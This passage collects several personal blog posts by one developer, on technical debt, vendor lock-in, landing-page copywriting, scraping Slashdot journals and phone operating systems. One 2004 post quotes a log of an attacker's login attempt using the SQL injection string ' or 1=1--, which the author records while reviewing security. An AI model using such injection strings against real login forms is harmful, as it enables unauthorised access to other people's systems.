* "Why is good code good? It's fast to work with. I prefer to say 'the code is understandable' because that makes it more clear. Good/bad sounds like inward looking practicing of a craft. 'Not Understandable' is more tangible - that means it's time-consuming and expensive to work with. Understandable code is faster and less expensive to work with." (35:20)
> "It all comes down to managing risk"
The people on the episode are Ruby developers, but the lessons they talk of apply regardless of language.
(Some of the quotations above are paraphrased)
## Thanks, now I'm even less sure what to do
Are you wrestling with something you don't like in a codebase you have to deal with? I'm guessing that's why you're here. Or maybe someone sent you this along with a rant about the tech debt in the codebase you own.
Either way, I suggest slowing down a bit, sitting down together (while maintaining social distancing), and considering how all the things that bother you about the code in front of you fit in to the various taxonomies detailed above. Then use that assessment to make a calm and rational plan about roughly where you want to get to. Then decide on the *one* next thing you will do towards that. Use the Ron Jeffries approach to get you there without wasting time on things that don't really matter.
Practically, that might mean if you have a user story, ticket or Trello card for a feature, it might take longer to do as you include the work to "pay down" some of that badness along the way, knowing that it will improve your overall velocity over time. Be wary of pulling out separate "debt" stories to do, though that can work if the team dynamic is right.
To keep your stress levels down make it a shared team problem, have a bit of a laugh about it, take regular breaks in the great outdoors, and support each other.
Good luck!
I'll leave you with this little song I found on YouTube about bugs:
<iframe width="560" height="315" src="https://www.youtube.com/embed/kuJI4hmvY8c" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
## Further Reading
If you want to avoid the task at hand by reading the whole internet in the hope that it will help, start here:
* A lengthy set of opinions on what to do with a huge 10 year old untested pile of spaghetti code: <https://softwareengineering.stackexchange.com/questions/416242/is-it-the-correct-practice-to-keep-more-than-10-years-old-spaghetti-legacy-code>
* Pluralsight have written an excellent long-form article on the subject: <https://www.pluralsight.com/blog/software-development/erasing-tech-debt>
* The Engineering Manager on technical debt: <https://www.theengineeringmanager.com/growth/how-to-argue-the-space-to-tackle-technical-debt/>
* <https://adevait.com/software/technical-debt>
* <https://medium.com/@adamberlinskyschine/wtf-is-technical-debt-b9e9d5f89d9>
* <https://wtfismyengineertalkingabout.com/2017/03/18/wtf-is-technical-debt/>
* <https://codingsans.com/blog/technical-debt>
* <https://builtin.com/software-engineering-perspectives/technical-debt>
* <https://www.bmc.com/blogs/technical-debt-explained-the-complete-guide-to-understanding-and-dealing-with-technical-debt/>
* <https://dzone.com/articles/what-technical-debt-it-and-how-to-calculate-it>
* <https://bigrivertech.com/technical_debt_assessment/>
* <https://www.cutter.com/consulting/technical-debt-assessment-and-valuation>
* <https://martinfowler.com/tags/technical%20debt.html>
* <https://codeclimate.com/blog/10-point-technical-debt-assessment/>
* <http://thinkapps.com/blog/development/technical-debt-calculation/>
* <https://www.productplan.com/glossary/technical-debt/>
* <https://leadership.garden/tips-on-prioritizing-tech-debt>
* <https://www.steveonstuff.com/2022/01/27/no-such-thing-as-clean-code>
* <https://leadership.garden/tips-on-prioritizing-tech-debt/>
<file_sep>---
title: "April showers came early. MS vendor lock in."
date: 2005-03-31
slashdot_url: https://slashdot.org/journal/102509/april-showers-came-early-ms-vendor-lock-in
---
<p>So, I went to the pub last night with my neighbour, which was nice. And we went on our bikes, which was nice. And we had a couple of drinks, which was nice. And we went outside to go home, and it was pouring with rain, which was interesting. So we got soaked.</p>
<p>Going to an MSDN evening later. Bit of professional development.</p>
<p>On another topic, it occurs to me that the standard practice in Microsoft.NET is to write software that only runs with MSSQL, this means there is starting to be a lot of code available that won't run on anything else. I imagine there are potential optimisations from writing specifically for ms sql, but I can't help thinking that it is a typical ms vendor lock in. Whether it was a conscious decision to make this the default or not I couldn't say and don't really care, the end result is the same. Take a look on codeproject and see how many projects say "only runs with ms sql".</p>
<file_sep>---
title: "good for nothing script kiddies"
date: 2004-02-26
slashdot_url: https://slashdot.org/journal/63429/good-for-nothing-script-kiddies
---
<p>Just been looking at the web logs for my cubs website (twyfordcubs.org.uk). Some one tried to get into the admin section, they found it though google, interesting.</p>
<p>The log entry:<br>2004-02-13 06:27:21 172.16.17.32 GET<nobr> </nobr>/cubs/admin.asp 200 2587 484 266 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)+Opera+7.11++[en] http://www.google.com/search?q=allinurl:.co.uk+admin.asp&hl=en&lr=&ie=UTF-8&oe=utf-8&start=80&sa=N</p>
<p>then, sure enough, entry in my log-on log:<br>login: ' or 1=1--<br>13/02/2004 06:27:29 172.16.17.32 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.11 [en]<br>Logged in: False</p>
<p>Pathetic attempt, but I'll bet they get in somewhere. My company's site for example - guess I'd better check up on that.<br>At least they're using a decent browser.</p>
<p>backtrace:<br>Tracing route to sisfo2.idola.net.id [172.16.17.32]<br>over a maximum of 30 hops:</p>
<p>
1 1 ms 1 ms 1 ms my.router [192.168.1.1]<br>
2 16 ms 16 ms 14 ms 81-86-71-1.dsl.pipex.com [81.86.72.1]<br>
3 16 ms 16 ms 16 ms 62-241-161-41.dsl.pipex.com [62.241.161.41]<br>
4 18 ms 16 ms 16 ms POS4-0.GW2.LND9.ALTER.NET [146.188.56.97]<br>
5 15 ms 16 ms 17 ms so-4-0-0.xr1.lnd9.alter.net [15172.16.17.32]<br>
6 16 ms 15 ms 16 ms so-0-1-0.TR1.LND9.ALTER.NET [146.188.15.33]<br>
7 94 ms 93 ms 94 ms so-7-0-0.IR1.NYC12.ALTER.NET [146.188.8.197]<br>
8 94 ms 94 ms 95 ms 0.so-1-0-0.IL1.NYC9.ALTER.NET [152.63.23.61]<br>
9 158 ms 160 ms 157 ms 0.so-1-1-0.TL1.SAC1.ALTER.NET [172.16.17.32]<br>
10 158 ms 157 ms 157 ms 0.so-7-0-0.XL1.SAC1.ALTER.NET [1192.168.3.11]<br>
11 158 ms 158 ms 157 ms 0.so-3-0-0.XR1.SAC1.ALTER.NET [192.168.3.11]<br>
12 157 ms 158 ms 158 ms POS6-0.IG2.SAC1.ALTER.NET [172.16.31.10]<br>
13 * * * Request timed out.<br>
14 * * * Request timed out.</p>
<p>PS: I wonder if password hashing is a bit extreme for a cubs website.</p>
<file_sep>---
layout: post
title: Teardown of a landing page story
date: 2018-12-10 08:40:13.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/12/10/teardown-of-a-landing-page-story/"
---
Here's my analysis of the depth of information and thought that's gone into a deceptively brief piece of landing-page copy. It's from <https://realtimeboard.com/blog/accelerate-growth-early-stage-startups/> that I'm trying to use as inspiration for <http://schemaexplorer.io/>
I had to de-construct the example story in order to work out how to do my own so having put the work in I thought I'd share it with you all here.
* * *
Here's the original in full:
> “Hey, I know that you have two kids and you’re always buying the same milk, eggs, peanut butter, and bread every single week, but you’re also both really busy working parents. You don’t have much time and you’d much rather be able to spend time at home with your family than being at a busy grocery store. So there’s this great service called Farmstead where you’re able to have that same stuff delivered to you. You don’t even have to think about it, you don’t have to remember each week to put in all of those same things that you order on a weekly basis anyway. They can just bring it to you and you don’t have to worry about it. Delivery is free with a weekly subscription. I think you should definitely try this out, I think you’re going to save yourself a bunch of time.”
And now one piece at a time with my observations about what is being conveyed in this information-dense block of prose. You are looking at the work of a pro when you read the above text, and unless you look closely it's easy to miss just how carefully crafted the whole thing is and how it touches on so many thoughts and feelings the ideal customer of Farmstead is likely to have, guiding them to the conclusion that they should give the service a try.
* * *
> Hey,
being personable, we are not a big faceless corporation, you can actually talk to us like humans
> I know that you have two kids
narrow down audience to parents (turn off non-parents, get parents more interested)
> and you’re always buying the same milk, eggs, peanut butter, and bread
describe a behaviour they recognise they already do (increase engagement with the text, encourage reading further), hint that we're going to solve a problem they have because they might be annoyed about the regular chore
> every single week,
slightly pejorative terminology hints at the fact you might not be happy about repeating this tedious task, draw attention to your current pain that we're going to solve
> but you’re also both really busy working parents.
focus down the pain point to be that it's a time consuming repeating the task and you wish you had more time back, hint that we're going to be giving that time back to you
> You don’t have much time
really drive that _you have no time_ point home
> and you’d much rather be able to spend time at home with your family
paint a picture of how much better your life would be if you take on our solution to your pain. Point out just what you're sacrificing to go to the shops.
> than being at a busy grocery store.
not only do you have the pain of lost time, but the experience of shopping is unpleasant (because it's so busy)
* * *
Now that you know it's you we want to help, we recognise your pain and we've shown we know how your life could be better...
> So there’s this great service called Farmstead
Introduce the brand name. Tease. Read on to satisfy that completion-bias tendency in your brain that leaves you yearning to know what information you don't have about this "Farmstead".
Also the name itself conveys a lot of meaning
"Farm" - fresh produce, direct from the supplier
"stead" - homely, small supplies, not industrial or full of chemicals
> where you’re able to have that same stuff
allay the fear that you'll still have to go back to the old thing anyway because there's something we don't sell
> delivered to you.
oh I see, so it's a door to door delivery service. Noted. The shape of the offering is starting to emerge.
> You don’t even have to think about it,
We've worked really hard on all our UX (user experience), automated as much as possible etc. so this will be easier than what you do now and better than competitors can do
> you don’t have to remember each week to put in all of those same things that you order on a weekly basis anyway.
now you know it's even got built in scheduled deliveries
> They can just bring it to you
re-iterate delivery
> and you don’t have to worry about it.
reminder that you do currently have to worry about getting your normal shop done, speaks to pain of running out of the things because you forgot, worrying how you're going to fit it in your day. Differentiates new offering as being something that just happens meaning you never run out
> Delivery is free
Objection handling - people don't want to pay for delivery when they could go to shops for nothing (even though it has a cost it's how people see it). People have been burned before by finding something good then being stung for expensive delivery. I would expect that this is a common objection/question that came back in earlier rounds of testing with users and it's been integrated into this prose to pre-empt the question before it's even been asked.
> with a weekly subscription.
warm people up to the payments they'll have to make in a non-threatening way
> I think you should definitely try this out,
nudge to take action. "Try" implies that it's not a commitment and you can change your mind, allaying fears of being locked in for a year
> I think you’re going to save yourself a bunch of time.
point to hard cost-benefit for the service - you don't have time (as mentioned to start with, we know this person feels like they have no time because they are still reading after they identified with the first section). One last reminder of the key pain to the offering solves - lack of time
* * *
Let me know if that's helped you in any way.
If you happen to be someone that deals with databases and are keen to try new tools then please do me a favour and sign up to the <http://schemaexplorer.io/> mailing list (you'll have to ignore my terrible marketing text till I'm as good as Brady).
~ Tim
<file_sep>---
title: Importing Slashdot Journal Articles by Yak
layout: post
---
I've imported all my old slashdot journal articles because:
- posterity
- I like the fact I've been writing on the internet for so long and I want my domain to show it
- there's something to be said for keeping your own writing on your own domain and not someone else's
- because I can.
It turns out that although slashdot has an export feature, it doesn't include the journal entries. Let the yak-shaving begin.
## What worked
Use wget to download all the paginated lists of posts into html files. (I forget whether I looped this or got wget to spider it, either would work).
Parse paginated list of posts to get individual post urls into file `urls.txt`:
```bash
#!/bin/sh -v
echo "" > urls.txt
for page in page*.html; do
xidel --data "$page" --xquery 'for $var in //article return $var//span[@class="story-title"]//a[@rel]/@href' >> urls.txt
done
```
Loop through those urls downloading the individual post pages
```bash
#!/bin/bash -v
mkdir -p posts
cd posts
while read url; do
echo $url
file="${url/https:\/\/slashdot.org\/journal\//}"
file2="${file/\//-}.html"
echo $file2
curl $url >> $file2
done < ../urls.txt
```
Parse the downloaded files, transforming them into individual markdown files:
```ruby
#!/usr/bin/env ruby
require 'nokogiri'
require 'date'
Dir.glob("posts/*").each do |input|
puts input
doc = File.open(input) { |f| Nokogiri::HTML(f) }
doc.css("article[data-fhtype='journal']").each do |a|
url=a.at_css(".story-title a[rel]").attribute("href").text
date = Date.parse(a.at_css("time").text[3..])
outfile = date.to_s + "-slashdot-journal-" + url[23..].gsub("/","-") + ".md"
puts outfile
File.open("out/" + outfile, "w") {|out|
out.write "---"
out.write "\n"
out.write "title: \"" + a.at_css(".story-title a[rel]").text + "\""
out.write "\n"
out.write "date: "+ date.to_s
out.write "\n"
out.write "slashdot_url: https:"+ url
out.write "\n"
out.write "---"
out.write "\n"
out.write "\n"
a.css("div[class=body] div[class=p]").each do |p|
out.write p.inner_html.strip
out.write "\n"
out.write "\n"
end
}
end
end
```
## Exploration with nokogiri
Once you have an html file on disk you can explore the in-memory model interactively with `irb`, which helps iterate on scripts like the above more rapidly.
E.g.
```ruby
$ irb
irb(main):001:0> doc = File.open("page-0.html") { |f| Nokogiri::XML(f) }
irb(main):002:0> doc.css("article[data-fhtype='journal']").each {|a| puts "---", "title: " + a.at_css(".story-title").text, "time: "+ a.at_css("time").text, "---";};nil
```
## Dead-ends explored
- [xq](https://github.com/sibprogrammer/xq) - doesn't seem to provide a rich enough expression to pick bits out of html and stitch them back together in interesting ways, more of a tool for capturing better structured data.
- [xidel](https://github.com/benibela/xidel) - can do xquery not just xpath, got further with this but not far enough
- `wget`'ing the paginated list of posts - for some reason this resulted in repeated content when parsed with nokogiri
- `wget`'ing individual post pages - suspected manipulation of html, so dropped down to `curl`
## References
- Example of xquery in action: <https://stackoverflow.com/questions/5987474/return-multiple-data-elements/5993577#5993577>
- Using xidel for parsing html: <https://stackoverflow.com/questions/21015587/get-content-between-a-pair-of-html-tags-using-bash/21026668#21026668>
- XQuery intro: <https://www.w3schools.com/xml/xquery_intro.asp>
- Using nokogiri for parsing, official docs: <https://nokogiri.org/#parsing-and-querying>
- Parsing with nokogiri: <https://nokogiri.org/tutorials/parsing_an_html_xml_document.html>
- [Nokogiri cheatsheet gist](https://gist.github.com/carolineartz/10276637)
- Scraping with nokogiri walkthrough: <https://dev.to/kreopelle/nokogiri-scraping-walkthrough-alk>
- Globbing files in ruby: <https://stackoverflow.com/questions/7677410/how-do-i-get-a-listing-of-only-files-using-dir-glob/7677543#7677543>
- Looping through file lines in ruby: <https://stackoverflow.com/questions/1521462/looping-through-the-content-of-a-file-in-bash/1521498#1521498>
- String replacement in bash: <https://linuxhandbook.com/replace-string-bash/>
- Parsing odd date formats with ruby: <https://stackoverflow.com/questions/11617410/parse-date-string-in-ruby/11617505#11617505>
<file_sep>---
title: "weekend update"
date: 2004-09-27
slashdot_url: https://slashdot.org/journal/85072/weekend-update
---
<p>Ok, it's been a while, and between now and then there was a super weekend.</p>
<p>Saturday. Spur of the moment cultural day with my super mate D. We went to see <a href="http://www.londontown.com/LondonEvents/Democracy/455d7">Democracy</a> at Wyndham's in the West End. The play provided fascinating insight into post war German politics. In the opening scene I thought I was not going to understand anything due to my not exactly perfect knowledge of German history, however it quickly became evident that the substance was a brilliant analysis of the personal feelings and motivations of those governing both West and East Germany up till the fall of the Berlin wall and nothing was presumed of the audience's knowledge. A scintillating two and a half hours.</p>
<p>There was also a china town feast, and a trip to see an old friend, which was truly a pleasure. Eventually I got reminded to go home as I was starting to look worse for wear, being somewhat cream crackered, and that, was that.</p>
<p>Sunday involved guitar playing, church going and pub testing with another close friend, who just happens to be next in the alphabet - E!<br>Glad to say my guitar practice is paying off a bit and I wasn't too rubbish by musical person's standards<nobr> </nobr>;). I had the opportunity to attempt playing flute - now there's an experience! Respect to all who have mastered that fine art, I managed to make a noise eventually but it wasn't pretty!</p>
<p>kisses to all</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "website stats"
date: 2004-10-16
slashdot_url: https://slashdot.org/journal/87126/website-stats
---
<p>apologies to anyone who had noticed <a href="http://timwise.dyndns.org/awstats/awstats.pl?config=timwise&configdir=/etc/awstats">my stats</a> have been offline since sep 24th.</p>
<p>I had a power failure which upset my linux server / knackered old laptop (no battery!), I had to <a href="http://awstats.sourceforge.net/docs/awstats_faq.html#OLDLOG">manually update</a> the entrys for all missed days and have only just got round to it. Should be ok now.</p>
<p>In other news, Kev has promised as a journal, further to putting <a href="http://homepage.ntlworld.com/andy.brook55/kev/">some photos</a>. online - good work mr kev. (note at bottom of pic pages a credit to me<nobr> </nobr>:)<br>Also Andy has an <a href="http://homepage.ntlworld.com/andy.brook55/">website</a> which is worth a look, check out the uni dessertation.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
layout: post
title: Multiple working folders for git on Windows XP
date: '2011-11-16T09:46:00.011Z'
author: <NAME>
tags:
- howto
- windows
- git
- ntfs
modified_time: '2011-11-17T14:47:33.704Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2649869241370803794
blogger_orig_url: https://timwise.blogspot.com/2011/11/multiple-working-folders-for-git-on.html
---
Multiple working folders for git on Windows XP (lucky me)
It is assumed that you have a git working copy of your project already in place
at `C:\code\myproject\` and that you want another copy of your project sharing
all history but with a different branch checked out at `C:\code\othercopy\`
This is useful for:
* rapidly switching between branches where a switch would normally cause a
time consuming recompile / rebuild
* tracking the branch structure of Visual SourceSafe (which you aren't using
in this century are you?) aka VSS aka Visual Source Shredder (or maybe TFS)
This can be achieved by use of [NTFS symbolic
links](http://en.wikipedia.org/wiki/NTFS_symbolic_link) (other related
keywords: junction points, reparse points, hard links). Grab [Sysinternals'
Junction](http://technet.microsoft.com/en-us/sysinternals/bb896768) to provide
access to NTFS symbolic links. Extract the contents and put `junction.exe` on
your path.
Word of warning for NTFS symbolic links in Windows XP:
* Windows Explorer in XP doesn't know about the NTFS symbolic links, and if
you delete the containing folder it will delete the real copy of your
linked folder (facepalm). **Take backups first! You have been warned!**
Open a command prompt and run the following commands:
cd c:\code\
mkdir othercopy
cd othercopy
mkdir .git
cd .git
junction hooks C:\code\myproject\.git\hooks
junction info C:\code\myproject\.git\info
junction logs C:\code\myproject\.git\logs
junction objects C:\code\myproject\.git\objects
junction refs C:\code\myproject\.git\refs
C:\code\othercopy\.git>copy C:\code\myproject\.git\* .
If you make a mistake, use `junction -d` to remove the branch point you have
created, **do not use explorer to delete a branch point** as it will delete all
your actual files.
You can now go into C:\code\othercopy\ and switch to a different branch, eg in git-bash:
cd c:
cd \code\othercopy\
git branch mynewbranch
git checkout -f mynewbranch
At this point you have two different checkouts sharing the same git data. Yay.
Word of warning for multiple working copies and
[git-extensions](http://code.google.com/p/gitextensions/):
* Git extensions gets confused if you remove a branch that one of your
working copies is on; and incorrectly shows the folder as uninitialised. To
resolve this use the context menu in explorer or the console to force
checkout a different branch.
This howto was written with "_git version 1.7.6.msysgit.0_" and _git-extensions v2.26_.
# References / see also
* [http://finik.net/2010/10/24/multiple-working-folders-with-single-git-repository/](http://finik.net/2010/10/24/multiple-working-folders-with-single-git-repository/)
* [http://en.wikipedia.org/wiki/NTFS_symbolic_link](http://en.wikipedia.org/wiki/NTFS_symbolic_link)
* [http://technet.microsoft.com/en-us/sysinternals/bb896768](http://technet.microsoft.com/en-us/sysinternals/bb896768)
* [http://code.google.com/p/gitextensions/](http://code.google.com/p/gitextensions/)
* [http://elegantcode.com/2011/03/15/git-tfs-where-have-you-been-all-my-life/](http://elegantcode.com/2011/03/15/git-tfs-where-have-you-been-all-my-life/)
* [http://github.com/spraints/git-tfs](http://github.com/spraints/git-tfs)
* Scripts for creating and unlinking extra working copies:
* [https://gist.github.com/1373136](https://gist.github.com/1373136) - create
* [https://gist.github.com/1373142](https://gist.github.com/1373142) - remove
<file_sep>---
title: "cv"
date: 2005-11-30
slashdot_url: https://slashdot.org/journal/123305/cv
---
<p>new cv released:<br><a href="http://timwise.co.uk/cv.pdf">http://timwise.co.uk/cv.pdf</a> [111Kb<nobr> </nobr>.pdf]</p>
<file_sep>---
layout: post
title: 'bad geek joke: the bourne shell'
date: '2007-03-30T00:36:00.000Z'
author: <NAME>
tags:
- fun
modified_time: '2008-07-26T15:34:20.890Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7355973608679429060
blogger_orig_url: https://timwise.blogspot.com/2007/03/bad-geek-joke-bourne-shell.html
---
Here's one I made earlier (19 Oct 2006 according to my pc):
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/7463254@N02/439217204/"><img
src="https://live.staticflickr.com/160/439217204_ddcd1306e6.jpg" alt="bourneshell.png"></a>
</div>
It's modified from [http://thebourneidentity.com/](http://thebourneidentity.com/), which is incidentally a film I very much like.
For those who don't know, this is the bourne shell:
[http://en.wikipedia.org/wiki/Bourne_shell](http://en.wikipedia.org/wiki/Bourne_shell)
Which is the father of [BASH](http://www.gnu.org/software/bash/) (/bin/bash, the Bourne Again SHell)
<file_sep>---
title: "warning: geek entry - vim"
date: 2005-11-04
slashdot_url: https://slashdot.org/journal/121333/warning-geek-entry---vim
---
<p>I've got to grips with the basics of emacs/xemacs, so I thought it was time I got up to speed with this ubiquitous vi thing.</p>
<p>I found a tutorial on my linux box (courtesy of <a href="http://www.linuxquestions.org/">linuxquestions</a>). It's under and hour, and I feel like I understand how to do basic editing now.</p>
<p>Fire up your trusty linux box, switch to a console (ctrl+alt+f1), login, then type 'vimtutor'.</p>
<p>Super, ~800 lines of interactivity that will have you up in no time...</p>
<file_sep>---
title: Phone setup notes
layout: post
---
This is epic, so here's a table of contents:
* This list will be replaced by table of contents. https://kramdown.gettalong.org/converter/html.html#toc
{:toc}
---
## About
Well this makes a good counterpart to the [laptop setup post](/2019/08/20/laptop-setup/). Similar idea, it's just a place for me to keep track of all the things involved in building a new phone from scratch. This one also explains to people who look at me like I'm mad why I don't just "do what everyone else does".
## Why don't you just...?
Most people don't think their phone install deserves a blog post, or even a lot of thought beyond a visit to the Apple "genius" bar (lol) so they can push the "copy everything to my new phone button". I'm not most people. I've been running Linux since approximately [Ubuntu 5.04 Hoary Hedgehog](https://en.wikipedia.org/wiki/Ubuntu_version_history#Ubuntu_5.04_(Hoary_Hedgehog)) in 2005 (the brown one). Even while being a ".NET developer", back when [Microsoft were still trying to simultaneously ignore and destroy Linux](https://en.wikipedia.org/wiki/Halloween_documents). What strange times we live in now with dotnet being open source and cross-platform, has the leopard changed its spots?
There are many factors in this battle for the phone in your pocket.
* The GPL's fundamental truth is that there is a tension for control over your devices between the creators of software and the users of that software. iOS and Android both believe that the users can't be trusted with full control over their device because "security". I believe this balance of power is important. Too far in either direction and things start to go badly:
* All the power in the hands of vendors at the expense of users results in exploitation, unfair pricing, anti-competitive practices, monopolies, duopolies (google+apple), cartels, and lack of innovation and quality due to lack of competition.
* On the flip side all the power in the hands of "users" (or at least user-developers) as per the pure GPL and it becomes difficult or impossible for capitalist processes to fund innovation and engineering effort due to the inability to capture generated value.
* The apps matter, I do actually want to use a phone for useful things, and increasingly web applications are a poor cousin to their equivalent apps. (Facebook, horror that it is, oscillates between making a browser unusable and making it just about possible to read and interact, they *really* want all that juicy extra data that you can get from being an installed app).
> iOS and Android both believe that users can't be trusted with full control over their device
This time in smartphones is a moment like my first linux install around the year 2006. I hated the main operating system (Windows) that I was locked in to. All the app[lication]s that I relied on (outlook, visual studio etc) were locked to the operating system I hated. And now in 2021 all the proprietary apps on phones are locked to android / iOS (gmail, authenticator, waze, google maps, banking apps, whatsapp etc.)
I could just install OpenGApps or similar to get the google play store on top of a slightly more free android variant; then install all the proprietary apps again, or I could see just how much I can do without google services by using microG and open source alternative apps like k9mail and maps.me. I've already started this journey by trying out many free alternatives and think it's worth pushing ahead. Running a build with no google services will be a good acid-test of how far I've got even if I have to go running back to the proprietary google services.
In my switch to Linux from Windows I just tried to do as much as I could with free software such as the gimp and thunderbird, often still installed on Windows, and then bit by bit I needed to fire up Windows less and less often as I found alternative apps and ways of doing things.
Any progress I can make here will make the jump to a fully free phone OS less painful in the future, and I'm increasingly confident that day will come just like I don't think twice about running Linux Mint even for work these days.
### Nursing Homes and Neighbourhoods
I highly recommend reading this article - [Purism, The Future of Computers: The Neighborhood and The Nursing Home](https://puri.sm/posts/the-future-of-computers-the-neighborhood-and-the-nursing-home/). It wonderfully illustrates the binary choice between the apple/google duopoly and the DIY open source and privacy movement with the rather apt analogy of nursing homes (apple etc where your needs are met but you give up control of your environment) and neighbourhoods (open source where it's up to you not let the wrong people in to renovate your house).
### Why not just Apple iOS?
Yes I know the iPhone crowd can just push a button on the new phone and have it look like the old phone, but iOS is the polar opposite of what I want my technology to be: under *my* control. That means root. That means open source. That means GPL.
iOS certainly does have some unique advantages that I will be sad to miss out on but not sad enough to give up all the other things I care about.
#### iOS, the good
* A secure boot chain, remarkably hacker-proof - even with physical device access which is very impressive.
* Impressively effective device-to-device migration of user settings and data (android failed miserably at this in my experiments)
#### iOS, the dubious-to-bad
* Complete reliance on a single vendor for looking after all your precious "data". This in my view is risky no matter how good the vendor is.
* In 2012 this was demonstrated as [<NAME> had *all* his data and devices wiped and locked remotely when a hacker took over his Apple account](https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/), and he had no other copy of all his precious family photos. A cautionary tale for all of us.
* Someone I know lost everything on their iPhone when the OS upgrade process somehow managed to do the following:
1. backup the phone to the iCloud
2. wipe the phone and install the updated iOS (I understand this is normal procedure)
3. back up the blank phone to iCloud *overwriting* the only backup (apparently there was only a single slot)
4. restore the blank backup to the updated phone
5. declare success, leaving my friend with all his data gone and a factory-installed OS
* No root (a problem for syncthing, independent backups and general user-control)
* No user-replaceable OS (aka ROM)
* No open source
* All the apps cost more!
### Why not just stock android?
"So you must be an android dude then" you say. Well no because frankly android isn't much better these days. Ever heard of [AOSP? (The Android Open Source Project)](https://source.android.com/) Well that's an ever-shrinking piece of what people call Android these days. Piece by piece [google have been replacing open-source android with proprietary rewrites](https://arstechnica.com/gadgets/2018/07/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/). Combine that with proprietary drivers for the endless churn in hardware. If you can even install AOSP on a device good luck getting much to work. The idea of android being "the open source one" in the true spirit of the GPL is a distant and fading memory.
There is a cartel of industry players called the [Open Handset Alliance](https://en.wikipedia.org/wiki/Open_Handset_Alliance) <http://www.openhandsetalliance.com/index.html>. These industry groups can be good but I think in this case they are a barrier to innovation and openness.
> "OHA members are contractually forbidden from producing devices that are based on competing forks of Android"
> ~ [Wikipedia on OHA](https://en.wikipedia.org/wiki/Open_Handset_Alliance)
[Ars Technica: "Google’s iron grip on Android: Controlling open source by any means necessary"](https://arstechnica.com/gadgets/2018/07/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/)
#### Root and backups
One of the big drivers I've had for getting a non-standard phone setup is that I don't want to rely on google to backup everything on my phone in case it dies, but because Android is by default locked in by secure boot and doesn't give the user any root access or ability to get root access that's a bit of a problem for the normal method of backing up a device.
A laptop backup is a question of backing up `/home` plus a [dotmatrix/bootstrap](https://github.com/timabell/dotmatrix) setup for regaining interesting configuration etc.
Android is a bit more complex because it has a couple of storage areas:
* an [emulated] 'sdcard' this is kinda like `/home` on a laptop and has things like downloaded files; some of the apps use this to save things to
* storage for every individual app (I learned about the existence of this by losing all my app data)
Every app on android runs under a separate userId, which allows Android to ensure that apps can't read each other's data. This is a good thing for security, but that means if you install a "backup app" it can't read any of the data you actually want backed up. And it can't get root because that's not available to you as a user or to any non-system apps.
So that means to backup independently of google, you need root, and to get root you need to unlock the whole boot chain.
I did have root on my OnePlus 5t, but an operating system update helpfully removed that for me... breaking my backups... and root access couldn't be restored without wiping the phone... including the data I didn't have backed up because it had broken my backups. Gah. Off the back of that experience I want to make sure that I'm not set up to fight some bloody vendor that doesn't believe I should have root.
Any hope of an effective root is dwindling. According to <https://www.androidpolice.com/a-new-method-for-hiding-root-in-magisk-may-soon-emerge/> the developer of Magisk Hide that prevented root being detected and thus allowed shitty apps to continue to be run has been *hired by google*. That's google following the advice of "keep friends close, keep your enemies closer" close if ever I've seen it. No better way to shut the project down than to pay off the developer with a "salary". Cough.
### Something other than iOS or Android and its derivatives?
It's all about the apps.
> An operating system is not that useful on its own.
There's a reason [Ballmer shouted "developers developers developers"](https://www.youtube.com/watch?v=KMU0tzLwhbE) (amusing as this meme has become in the abstract). An operating system is not that useful on its own. Operating systems live and die by the applications (aka apps) available on them, and the utility and value they in turn bring to their users.
iOS and Android have utterly captured the app market on phones, creating a duopoly in the phone space.
Even the mighty Nokia (with [Symbian](https://en.wikipedia.org/wiki/Symbian)), [Research In Motion (RIM) with Blackberry](https://en.wikipedia.org/wiki/BlackBerry_10)`*` and Microsoft with [Windows Phone](https://en.wikipedia.org/wiki/Windows_Phone) failed to win against them and eventually threw in the towel.
`*` Blackberry seems to have all but fallen off the radar, they started shipping android in the end basically being an android phone with a physical keyboard thus becoming part of the apple-google duopoly.
So for me that rules out for the time being all the Linux based phones such as a [Librem 5 running PureOS](https://shop.puri.sm/shop/librem-5/). (See below).
> It's only when alternatives like Librem/PureOS gain traction that we'll see the makers of apps, websites and phones have to create and adopt open standards that allow further diversity and innovation.
The fact the Librem exists and seems to be sustainable are encouraging signs for the breaking of the google+apple duopoly on mobiles. It's only when alternatives like Librem/PureOS gain traction that we'll see the makers of apps, websites and phones have to create and adopt open standards that allow further diversity and innovation. Currently we are seeing a repeat of the "works best in Netscape / Internet Explorer" duopoly of the browser wars that was eventually broken forever by Firefox, Opera and friends forcing websites to stop using proprietary extensions and stick to open standards.
#### Dearly departed
##### Nokia / Symbian
Symbian was briefly ahead on features as an OS in my opinion. I had a Sony Ericsson [P800](https://en.wikipedia.org/wiki/Sony_Ericsson_P800) and [P910](https://en.wikipedia.org/wiki/Sony_Ericsson_P910) and in their day they were *almost* amazing phones, hampered by lacking hardware (2g at the dawn of 3g, serial port connectivity emulated over usb, and for god knows what reason Sony were still trying to beat SD cards with [memory stick](https://en.wikipedia.org/wiki/Memory_Stick)). Consumers flocked away from them in droves to the new iPhone.
##### Microsoft / Windows Phone OS
Microsoft's ["Windows Phone" was a triumph of a phone operating system](https://www.theverge.com/2017/10/10/16452162/windows-phone-history-glorious-failure), and everyone I knew that had one absolutely loved the operating system. But [Microsoft just couldn't persuade the big-name mobile-app developers](https://www.theverge.com/2015/10/23/9602350/microsoft-windows-phone-app-removal-windows-store) (i.e. companies) to invest the endless effort required to create and maintain a third version of their apps for another app store.
##### OpenMoko / Neo FreeRunner
I had high hopes for the truly open Neo running OpenMoko, but it didn't stand a hope in hell amongst the rapidly evolving tech and software at the time. I bought the [Neo FreeRunner](https://en.wikipedia.org/wiki/Openmoko#Neo_FreeRunner) and it was an exciting time, but it quickly became a relic.
##### CyanogenMod
